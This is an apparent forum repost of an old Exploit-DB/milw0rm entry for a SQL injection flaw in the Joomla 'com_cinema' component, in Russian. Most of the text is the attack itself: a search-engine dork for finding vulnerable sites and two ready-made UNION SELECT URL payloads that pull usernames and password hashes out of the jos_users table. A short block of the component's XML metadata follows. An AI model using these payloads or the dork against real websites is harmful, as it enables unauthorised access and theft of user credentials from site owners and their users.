Exploit Joomla! Component Cinema 1.0 - SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5300
Проверка EDB
  1. Пройдено
Автор
S@BUN
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2008-03-23
Код:
##########################################
#
# Joomla Component com_cinema SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : [email protected]
#
###########################################
#
# DORK 1 : allinurl: "com_cinema"
#
###########################################
EXPLOiT 1 :

index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(username,0x3a,password)/**/from/**/jos_users/*

EXPLOiT 2 :

index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,29,29,30,concat(username,0x3a,password)/**/from/**/jos_users/*

###########################################
------------------S@BUN-------------------#
###########################################
[email protected]#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################

side note:

  <name>Cinema</name>
  <creationDate>25.03.2006</creationDate>
  <author>Vamba & Luscarpa</author>
  <copyright>Copyright 2006 by Vamba & Luscarpa.</copyright>
  <license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>  
  <authorEmail>[email protected] - [email protected]</authorEmail>

  <authorUrl>www.joomlaitalia.com - www.webagain.net</authorUrl>
  <version>1.0</version>
  <description>Componente Cinema per organizzare la tua videoteca. Componente realizzato sulla base di Akogallery</description>

# milw0rm.com [2008-03-23]
 
Источник
www.exploit-db.com

Похожие темы